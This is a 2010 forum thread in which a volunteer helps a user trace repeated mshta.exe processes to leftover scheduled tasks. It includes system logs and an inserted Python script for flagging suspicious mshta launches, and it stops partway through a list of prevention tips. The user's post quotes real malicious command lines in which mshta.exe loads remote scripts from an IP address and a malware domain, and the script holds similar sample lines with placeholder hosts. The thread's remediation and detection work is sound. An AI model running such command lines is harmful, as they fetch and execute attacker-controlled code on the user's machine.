mshta.exe repeatedly appearing in Task Manager



TheDeepBlue
2010-12-27, 00:56
For a few days now, the program mshta.exe has been appearing multiple times in my Task Manager, even if I end them all at any given time. I've seen as many as a couple dozen instances of the program. While it hasn't caused too many major problems yet, at least that I can tell, the file size seems to be getting larger. The smallest I've seen it is around 8 K. A few minutes ago, each instance was at 13 K. I don't like this trend.

I've tried looking up a solution on the interwebs myself, and deleted over a thousand tracking cookies and at least one legit piece of malware in the process, but to no avail. From what I've read so far, the two things that leaped out at me the most are:
1) mshta.exe is a legit system32 file, and its repeated appearance may be a bug with my operating system in conjunction with the Add or Remove Programs tool, and
2) mshta.exe's repeated appearance may be a symptom of something that doesn't belong; if not 1), then something worse.

I think that the most significant thing I (intentionally) did before this started happening was that I installed a new version of AIM without uninstalling the old version first; I didn't like the new version, so I uninstalled it using the uninstaller that came with it.

Anyway, a friend vouched for this board and I'm giving it a shot. Halp.



DDS (Ver_10-12-12.02) - NTFSx86
Run by Erick at 16:23:04.03 on Sun 12/26/2010
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_15
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.3583.2650 [GMT -6:00]

AV: AVG Anti-Virus *Enabled/Updated* {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINNT\system32\svchost -k DcomLaunch
svchost.exe
C:\WINNT\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgwdsvc.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\WINNT\system32\LxrJD31s.exe
C:\WINNT\system32\nvsvc32.exe
C:\Program Files\AVG\AVG9\avgam.exe
C:\Program Files\AVG\AVG9\avgnsx.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINNT\system32\svchost.exe -k imgsvc
C:\WINNT\Explorer.EXE
C:\Program Files\SmartDisk\Flash Media Reader\shwicon.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\WINNT\system32\RUNDLL32.EXE
C:\PROGRA~1\AVG\AVG9\avgtray.exe
C:\WINNT\system32\devldr32.exe
C:\WINNT\system32\ctfmon.exe
C:\program files\steam\steam.exe
C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\Program Files\AIM\aim.exe
C:\WINNT\System32\mshta.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mshta.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINNT\System32\mshta.exe
C:\Documents and Settings\Erick\Local Settings\Temporary Internet Files\Content.IE5\JRV62GV1\dds[1].scr

============== Pseudo HJT Report ===============

uStart Page = hxxp://www.hotmail.com/
uSearch Page = hxxp://www.google.com
uSearch Bar = hxxp://www.google.com/ie
uURLSearchHooks: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} - c:\program files\avg\avg9\toolbar\IEToolbar.dll
mURLSearchHooks: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} - c:\program files\avg\avg9\toolbar\IEToolbar.dll
BHO: AcroIEHlprObj Class: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll
BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg9\avgssie.dll
BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: AVG Security Toolbar BHO: {a3bc75a2-1f87-4686-aa43-5347d756017c} - c:\program files\avg\avg9\toolbar\IEToolbar.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
TB: AVG Security Toolbar: {ccc7a320-b3ca-4199-b1a6-9f516dd69829} - c:\program files\avg\avg9\toolbar\IEToolbar.dll
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File
uRun: [MSMSGS] "c:\program files\messenger\msmsgs.exe" /background
uRun: [ctfmon.exe] c:\winnt\system32\ctfmon.exe
uRun: [Steam] "c:\program files\steam\steam.exe" -silent
uRun: [LightScribe Control Panel] "c:\program files\common files\lightscribe\LightScribeControlPanel.exe" -hidden
uRun: [SUPERAntiSpyware] c:\program files\superantispyware\SUPERAntiSpyware.exe
mRun: [ShowIcon_SmartDisk Corporation_SmartDisk Flash Media Reader Support 2.1] "c:\program files\smartdisk\flash media reader\shwicon.exe" -t"smartdisk corporation\SmartDisk Flash Media Reader Support 2.1"
mRun: [SW20] "c:\winnt\system32\sw20.exe"
mRun: [RemoteControl] "c:\program files\cyberlink\powerdvd\PDVDServ.exe"
mRun: [LanguageShortcut] "c:\program files\cyberlink\powerdvd\language\Language.exe"
mRun: [LGODDFU] "c:\program files\lg_fwupdate\fwupdate.exe" blrun
mRun: [SecurDisc] "c:\program files\nero\nero 7\incd\NBHGui.exe"
mRun: [InCD] "c:\program files\nero\nero 7\incd\InCD.exe"
mRun: [HP Software Update] c:\program files\hp\hp software update\HPWuSchd2.exe
mRun: [NvCplDaemon] RUNDLL32.EXE c:\winnt\system32\NvCpl.dll,NvStartup
mRun: [nwiz] nwiz.exe /install
mRun: [NvMediaCenter] RUNDLL32.EXE c:\winnt\system32\NvMcTray.dll,NvTaskbarInit
mRun: [GEST] ]
mRun: [QuickTime Task] "c:\program files\quicktime\qttask.exe" -atboottime
mRun: [<NO NAME>]
mRun: [AVG9_TRAY] c:\progra~1\avg\avg9\avgtray.exe
mRun: [EvtMgr6] c:\program files\logitech\setpointp\SetPoint.exe /launchGaming
dRunOnce: [^SetupICWDesktop] c:\program files\internet explorer\connection wizard\icwconn1.exe /desktop
dRunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe
StartupFolder: c:\docume~1\erick\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\erick\startm~1\programs\startup\erunta~1.lnk - c:\program files\erunt\AUTOBACK.EXE
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adobeg~1.lnk - c:\program files\common files\adobe\calibration\Adobe Gamma Loader.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\adober~1.lnk - c:\program files\adobe\acrobat 7.0\reader\reader_sl.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\hpdigi~1.lnk - c:\program files\hp\digital imaging\bin\hpqtra08.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\micros~1.lnk - c:\program files\microsoft office\office\OSA9.EXE
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - c:\program files\aim\aim.exe
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
Trusted Zone: cityofheroes.com\boards
Trusted Zone: sun.com\java
DPF: DirectAnimation Java Classes - file://c:\winnt\java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\winnt\java\classes\xmldso.cab
DPF: RaptisoftGameLoader - hxxp://www.miniclip.com/haphazard/raptisoftgameloader.cab
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://www.apple.com/qtactivex/qtplugin.cab
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/5/b/0/5b0d4654-aa20-495c-b89f-c1c34c691085/LegitCheckControl.cab
DPF: {233C1507-6A77-46A4-9443-F871F945D258} - hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: {41F17733-B041-4099-A042-B518BB6A408C} - hxxp://a1540.g.akamai.net/7/1540/52/20031216/qtinstall.info.apple.com/mickey/us/win/QuickTimeInstaller.exe
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} - hxxp://gfx1.hotmail.com/mail/w2/resources/MSNPUpld.cab
DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} - hxxp://cdn.scan.onecare.live.com/resource/download/scanner/wlscbase5483.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} - hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1147640637654
DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} - hxxp://download.divx.com/player/DivXBrowserPlugin.cab
DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} - hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1148195024359
DPF: {77E32299-629F-43C6-AB77-6A1E6D7663F6} - hxxp://download.shockwave.com/pub/otoy/OTOYAX.cab
DPF: {7C6E92FA-4429-4FB6-909B-798E2EFFAEF0} - hxxp://www.coh.co.kr/common/ocx/ncweb.cab
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} - hxxp://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38094.4437847222
DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} - hxxp://cdn2.zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
DPF: {C49134CC-B5EF-458C-A442-E8DFE7B4645F} - hxxp://www.yoyogames.com/downloads/activex/YoYo.cab
DPF: {CAFEEFAC-0014-0002-0008-ABCDEFFEDCBA} - hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.5.0/jinstall-1_5_0_11-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_02-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_05-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_07-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} - hxxp://www.popcap.com/games/popcaploader_v6.cab
DPF: {E5D419D6-A846-4514-9FAD-97E826C84822} - hxxp://fdl.msn.com/zone/datafiles/heartbeat.cab
DPF: {FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6} - hxxp://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab
Handler: avgsecuritytoolbar - {F2DDE6B2-9684-4A55-86D4-E255E237B77C} - c:\program files\avg\avg9\toolbar\IEToolbar.dll
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg9\avgpp.dll
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
Notify: avgrsstarter - avgrsstx.dll
Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:\program files\common files\lightscribe\LSRunOnce.exe"
Hosts: 127.0.0.1 www.spywareinfo.com

================= FIREFOX ===================

FF - ProfilePath - c:\docume~1\erick\applic~1\mozilla\firefox\profiles\neepi7vu.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - hxxp://en-us.start.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:en-US:official
FF - component: c:\program files\avg\avg9\firefox\components\avgssff.dll

---- FIREFOX POLICIES ----
FF - user.js: network.protocol-handler.warn-external.dnupdate - false
============= SERVICES / DRIVERS ===============

R0 AvgRkx86;avgrkx86.sys;c:\winnt\system32\drivers\avgrkx86.sys [2009-5-28 52872]
R0 JAHCI;JAHCI;c:\winnt\system32\drivers\JAHCI.sys [2006-5-15 33280]
R0 uliagpkx;ULi AGP Bus Filter Driver;c:\winnt\system32\drivers\AGPKX.SYS [2006-5-14 45056]
R1 AvgLdx86;AVG AVI Loader Driver x86;c:\winnt\system32\drivers\avgldx86.sys [2009-5-28 216400]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86;c:\winnt\system32\drivers\avgmfx86.sys [2009-5-28 29584]
R1 AvgTdiX;AVG8 Network Redirector;c:\winnt\system32\drivers\avgtdix.sys [2009-5-28 243024]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R2 avg9wd;AVG WatchDog;c:\program files\avg\avg9\avgwdsvc.exe [2010-6-22 308136]
R2 LBeepKE;Logitech Beep Suppression Driver;c:\winnt\system32\drivers\LBeepKE.sys [2010-6-19 10448]
S3 Afdfprmnnp;Afdfprmnnp; [x]
S3 AvFlt;Antivirus Filter Driver;c:\winnt\system32\drivers\av5flt.sys --> c:\winnt\system32\drivers\av5flt.sys [?]
S3 AVG Security Toolbar Service;AVG Security Toolbar Service;c:\program files\avg\avg9\toolbar\ToolbarBroker.exe [2010-10-26 517448]
S3 Ms_mdsvr;Ms_mdsvr; [x]
S3 SetupNTGLM7X;SetupNTGLM7X;\??\d:\ntglm7x.sys --> d:\NTGLM7X.sys [?]
S3 SiS7012;Service for AC'97 Sample Driver (WDM);c:\winnt\system32\drivers\sis7012.sys [2003-10-28 820858]
S3 Sybsaccegw;Sybsaccegw; [x]
S3 ULI5261XP;ULi M526X Ethernet NT Driver;c:\winnt\system32\drivers\ULILAN51.SYS [2006-5-14 28672]
S3 usbhub20;USB 2.0 Root Hub Support;c:\winnt\system32\drivers\usbhub20.sys [2003-7-14 49776]

=============== Created Last 30 ================

2010-12-26 15:36:14 -------- d-----w- c:\docume~1\erick\applic~1\SUPERAntiSpyware.com
2010-12-26 15:36:14 -------- d-----w- c:\docume~1\alluse~1\applic~1\SUPERAntiSpyware.com
2010-12-26 15:36:09 -------- d-----w- c:\program files\SUPERAntiSpyware
2010-12-24 16:49:33 388096 ----a-r- c:\docume~1\erick\applic~1\microsoft\installer\{45a66726-69bc-466b-a7a4-12fcba4883d7}\HiJackThis.exe
2010-12-24 16:49:33 -------- d-----w- c:\program files\Trend Micro
2010-12-24 16:45:20 -------- d-----w- c:\docume~1\erick\locals~1\applic~1\CoHelper
2010-12-23 16:49:43 -------- d-----w- c:\docume~1\erick\locals~1\applic~1\AOL
2010-12-23 16:48:34 -------- d-----w- c:\docume~1\erick\locals~1\applic~1\AIM
2010-12-23 16:48:34 -------- d-----w- c:\docume~1\alluse~1\applic~1\AIM
2010-12-23 16:48:18 -------- d-----w- c:\program files\common files\Software Update Utility
2010-12-23 16:48:15 -------- d-----w- c:\program files\common files\AOL
2010-12-15 18:36:05 40960 -c----w- c:\winnt\system32\dllcache\ndproxy.sys
2010-12-15 18:35:32 45568 -c----w- c:\winnt\system32\dllcache\wab.exe
2010-12-03 16:25:54 -------- d-----w- c:\program files\Titan Network

==================== Find3M ====================

2010-11-18 18:12:44 81920 ----a-w- c:\winnt\system32\isign32.dll
2010-11-07 16:30:10 221 ----a-w- c:\docume~1\erick\applic~1\sdrfzfgd.bat
2010-11-06 00:26:58 916480 ----a-w- c:\winnt\system32\wininet.dll
2010-11-06 00:26:58 43520 ----a-w- c:\winnt\system32\licmgr10.dll
2010-11-06 00:26:58 1469440 ----a-w- c:\winnt\system32\inetcpl.cpl
2010-11-03 12:25:54 385024 ----a-w- c:\winnt\system32\html.iec
2010-10-28 13:13:22 290048 ----a-w- c:\winnt\system32\atmfd.dll
2010-10-26 13:25:00 1853312 ----a-w- c:\winnt\system32\win32k.sys

============= FINISH: 16:23:41.31 ===============

shelf life
2010-12-30, 17:27
hi TheDeepBlue,

Your log is a few days old. If you still need help reply back.

TheDeepBlue
2010-12-30, 19:52
hi TheDeepBlue,

Your log is a few days old. If you still need help reply back.
Yup, it's still goin' on. I was just being attentive to the part where I was supposed to wait four full days.

If it's worth mentioning, I've seen the mshta.exe file sizes go a bit above 14 K since my first post. Also, I've noticed that I have multiple copies of svchost.exe running, with a couple running under NETWORK SERVICE and three under SYSTEM, as viewed from the Task Manager. The size of the largest svchost.exe file running under SYSTEM is 34.7 K and change.

shelf life
2010-12-30, 22:23
ok. For now you can get another download as a check for malware. We can also upload the .exe to a web site to get it checked out.

Please download the free version of Malwarebytes (http://www.malwarebytes.org/mbam.php) to your desktop.
Double-click mbam-setup.exe and follow the prompts to install the program.
Be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
If an update is found, it will download and install the latest version.
Once the program has loaded, select Perform FULL SCAN, then click Scan.
When the scan is complete, click OK, then Show Results to view the results.
Be sure that everything is checked, and click *Remove Selected.*

*A restart of your computer may be required to remove some items. If prompted please restart your computer to complete the fix.*

When completed, a log will open in Notepad. Please save it to a convenient location. The log can also be opened by going to Start > All Programs > Malwarebytes' Anti-Malware > Logs > log-date.txt
Post the log in your reply.

Go to this web site (http://www.virustotal.com/), browse for the file in the system32 directory, then upload it to the website using the Send File button. The site can be busy at times. You should see nothing listed under the result column.

TheDeepBlue
2010-12-31, 10:43
Updated MWB and ran Full Scan. Log follows:


Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4052

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/30/2010 9:49:36 PM
mbam-log-2010-12-30 (21-49-36).txt

Scan type: Full scan (C:\|)
Objects scanned: 289794
Time elapsed: 1 hour(s), 7 minute(s), 9 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 1

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\System Volume Information\_restore{5E13212F-CDA6-4B95-8318-ABB4B45FA9B3}\RP143\A0007225.sys (Rootkit.Agent) -> No action taken.


I didn't clearly understand whether or not you wanted me to upload the mshta.exe file to VirusTotal, but I did go ahead and upload the file from the log above. This is what VirusTotal says initially:

MD5: 589312a3b46721c5a751e4d5222a89be
Date first seen: 2008-09-13 14:30:26 (UTC)
Date last seen: 2010-12-28 22:43:40 (UTC)
Detection ratio: 8/43

SHA1 : 3a497d3968a4f6e3c648d196da38e5f98e75ec30
SHA256: 03cbe6df7f5605a3659ffe27a1184a8d9066436a17d7bac9cceb122de74f69ae

There aren't very many comments on the site in reference to the file, but someone is saying that it's a 'part of malware' and others are saying that it's part of an antirootkit program called 'Avenger' or something, which I don't recall ever downloading.

TheDeepBlue
2010-12-31, 11:15
Would have edited my last post, but I can't on this forum. I did remove the anomalous files detected by MWB with the program; I wasn't aware it would generate another log, so here's that one:


Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Database version: 4052

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

12/31/2010 2:48:13 AM
mbam-log-2010-12-31 (02-48-13).txt

Scan type: Quick scan
Objects scanned: 1
Time elapsed: 1 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)

shelf life
2010-12-31, 17:42
It's a legit MS file that could be used by malware. I have seen it as a scheduled job for launching malware. Legit software can use it also.
Let's see if we can find out what is using it. I would download either one of these two utilities: Process Hacker (http://processhacker.sourceforge.net/) or Process Explorer (http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx); both are similar. Both downloads are zip files. Extract to your desktop.
In Process Hacker you want to use the .exe that's in the x86 folder.
For either one, once you start the .exe, find the mshta.exe process, right click on it and select Properties and see what is listed in the command line. May provide some clues.

TheDeepBlue
2010-12-31, 21:20
The command line for each individual mshta.exe I've got running right now gives:

mshta.exe http://85.234.191.60/88.php?olala=327228975368992
mshta.exe http://funnypandashow.com/sdfg.php?d0tg=725519501766446
mshta.exe http://85.234.191.60/88.php?olala=47637796927128
mshta.exe http://85.234.191.60/88.php?olala=327228975368992
mshta.exe http://funnypandashow.com/sdfg.php?d0tg=725519501766446
mshta.exe http://85.234.191.60/88.php?olala=47637796927128
mshta.exe http://85.234.191.60/88.php?olala=327228975368992

shelf life
2010-12-31, 23:15
Take a look in task scheduler for any tasks.
start>programs>accessories>system tools>scheduled tasks
You can right click on each task and select Delete if it is something you don't recognise.

TheDeepBlue
2011-01-01, 00:10
Found over seventy tasks that I'm pretty sure I didn't set that came from one or the other of the two things in my previous post. Deleted them all.

I googled the 'funnypandashow.com' thing and it seems to be related to that Thinkpoint thing that's going around. I've dealt with it at least three times in the past and for some reason it seemed to always load Adobe Reader at the same time it hit my system. Ever since I patched Adobe Reader, I haven't seen it again, but apparently something might still be on my machine...?

shelf life
2011-01-01, 03:47
Pretty sure this is just a harmless leftover from previous malware that didn't get cleaned up. The task was to run mshta.exe at certain times but was missing another critical component for it to be successful; it was probably removed by a scan, leaving only the scheduled task to run but unable to complete with a component missing. That's my take on it anyway.

Now that you have deleted the tasks, the mshta.exe process shouldn't be running in Task Manager anymore. The Malwarebytes scan looks good. Why don't you give it a day or two, cruise around and make sure you don't have any other signs of malware on your machine. Link to some signs below.
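The manual check in this thread was to read each mshta.exe command line in Process Explorer and then hunt through Scheduled Tasks for the entries that kept respawning it. The Python below is an added example, not code from the thread, Process Explorer or Process Hacker: it runs that same check over (pid, command line) and (task name, command) records, flags mshta.exe launches whose HTA comes from a remote host, and leaves the legitimate local-.hta use alone. All sample records, PIDs and hosts in it are constructed placeholders.

```python
"""Triage mshta.exe launches whose script comes from a remote URL.

Added example, not code from the thread, Process Explorer or Process Hacker:
it automates the thread's manual check of each mshta.exe command line (and
each scheduled task's run command), separating the legitimate use, a local
.hta file, from an HTA fetched over the network. Sample records below are
constructed; the hosts are placeholders, not indicators.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import urlsplit

# mshta.exe, optionally preceded by a path and wrapped in quotes, then its first argument.
MSHTA_RE = re.compile(r'(?:^|[\\"\s])mshta(?:\.exe)?"?\s+(?P<arg>\S+)', re.IGNORECASE)
REMOTE_SCHEMES = {"http", "https", "ftp"}
INLINE_SCHEMES = {"javascript", "vbscript"}


@dataclass(frozen=True)
class Finding:
    source: str   # "process" or "task"
    label: str    # PID or task name
    detail: str   # "remote:<host>" or "inline"
    cmdline: str


def classify_mshta(cmdline: str) -> Optional[str]:
    """Return None for a non-mshta line or mshta.exe on a local .hta file,
    "remote:<host>" when the HTA is fetched over the network (the shape seen
    in the thread), or "inline" for a javascript:/vbscript: URI argument."""
    m = MSHTA_RE.search(cmdline)
    if not m:
        return None
    parts = urlsplit(m.group("arg").strip('"'))
    scheme = parts.scheme.lower()
    if scheme in REMOTE_SCHEMES and parts.hostname:
        return f"remote:{parts.hostname}"
    if scheme in INLINE_SCHEMES:
        return "inline"
    return None  # a local path like C:\...\x.hta parses its drive letter as the scheme


def triage_processes(processes: Iterable[Tuple[int, str]]) -> Iterator[Finding]:
    """Apply the check to (pid, command line) pairs from a process listing."""
    for pid, cmd in processes:
        verdict = classify_mshta(cmd)
        if verdict:
            yield Finding("process", str(pid), verdict, cmd)


def triage_tasks(tasks: Iterable[Tuple[str, str]]) -> Iterator[Finding]:
    """Apply the check to (task name, task-to-run) pairs from Scheduled Tasks,
    the persistence that kept respawning mshta.exe in the thread."""
    for name, cmd in tasks:
        verdict = classify_mshta(cmd)
        if verdict:
            yield Finding("task", name, verdict, cmd)


def summarize(findings: Iterable[Finding]) -> Counter:
    """Count findings per verdict so a host recurring across dozens of processes stands out."""
    return Counter(f.detail for f in findings)


# Constructed sample records shaped like the thread's command lines (placeholder hosts).
SAMPLE_PROCESSES = [
    (1204, r"C:\WINNT\System32\mshta.exe http://198.51.100.7/88.php?olala=327228975368992"),
    (1316, r"C:\WINNT\System32\mshta.exe http://panda-show.example/sdfg.php?d0tg=725519501766446"),
    (1488, r"C:\WINNT\System32\mshta.exe http://198.51.100.7/88.php?olala=47637796927128"),
    (1502, r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),  # legitimate local HTA, not flagged
    (1010, r"C:\WINNT\System32\svchost.exe -k netsvcs"),
]
SAMPLE_TASKS = [
    ("At47", r"C:\WINNT\System32\mshta.exe http://198.51.100.7/88.php?olala=327228975368992"),
    ("Vendor Updater", r'"C:\Program Files\Vendor\Updater.exe" /quiet'),
]

if __name__ == "__main__":
    findings = list(triage_processes(SAMPLE_PROCESSES)) + list(triage_tasks(SAMPLE_TASKS))
    for f in findings:
        print(f"{f.source:8}{f.label:16}{f.detail:30}{f.cmdline}")
    print(summarize(findings))
```

On a live machine, feed it the command lines from Process Explorer or `wmic process get processid,commandline` and the run commands from the Scheduled Tasks folder; a host that shows up under many PIDs and in the task list at once is the pattern this thread ended up finding.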

shelf life
2011-01-02, 23:19
How's it looking on your end now?

TheDeepBlue
2011-01-03, 08:37
Everything's still looking good. Thank you very much for the help!

shelf life
2011-01-03, 13:14
Ok, good. You're welcome. You can remove Process Explorer/Hacker if you want to. Just delete the folder/icons from your desktop.
A few tips to help you remain malware free:

10 Tips for Prevention and Avoidance of Malware:
There is no reason why your computer can not stay malware free.

No software can think for you. Help yourself. In no special order:

1) It is essential to keep your operating system (Windows), browser (IE, FireFox, Chrome, Opera) and other software up to date to "patch" vulnerabilities that could be exploited. Visit Windows Update (http://www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en-us) frequently or use the Windows auto-update feature (http://www.microsoft.com/windows/downloads/windowsupdate/automaticupdate.mspx). Staying updated is also essential for other web based applications like Java, Adobe Flash/Reader, iTunes etc. More and more third party applications are being targeted. Not sure if you are using the latest version of software? Check their version status and get the updates here (http://secunia.com/vulnerability_scanning/online/).

2) Know what you are installing to your computer. A lot of software can come bundled with unwanted add-ons, like adware, toolbars and malware. More and more legitimate software is installing useless toolbars if not unchecked first. Do not install any files from ads, popups or random links. Do not fall for fake warnings about virus and trojans being found on your computer and you are then prompted to install software to remedy this. See also the signs (http://www.malwarevault.com/signs.html) that you may have malware on your computer.

3) Install and keep updated: one antivirus and two or three anti-malware applications. If not updated they will soon be worthless. If either of these frequently finds malware then it's time to *review your computer habits*.

4) Refrain from clicking on links or attachments via E-Mail, IM, IRC, Chat Rooms, Blogs or Social Networking Sites, no matter how tempting or legitimate the message may seem. See also E-mail phishing Tricks (http://www.fraud.org/tips/internet/phishing.htm).

5) Do not click on ads/pop ups or offers from websites requesting that you need to install software to your computer--*for any reason*. Use the Alt+F4 keys to close the window.

6) Don't click on offers to "scan" your computer. Install ActiveX Objects with care. Do you trust the website to install components?

7) Consider the use of limited (non-privileged) accounts for everyday use, rather than administrator accounts. Limited accounts (http://www.microsoft.com/protect/computer/advanced/useraccount.mspx) can help prevent *malware from installing and lessen its potential impact.* This is exactly what user account control (UAC) in Windows Vista and Windows 7 attempts to address.

8) Install and understand the *limitations* of a software firewall.

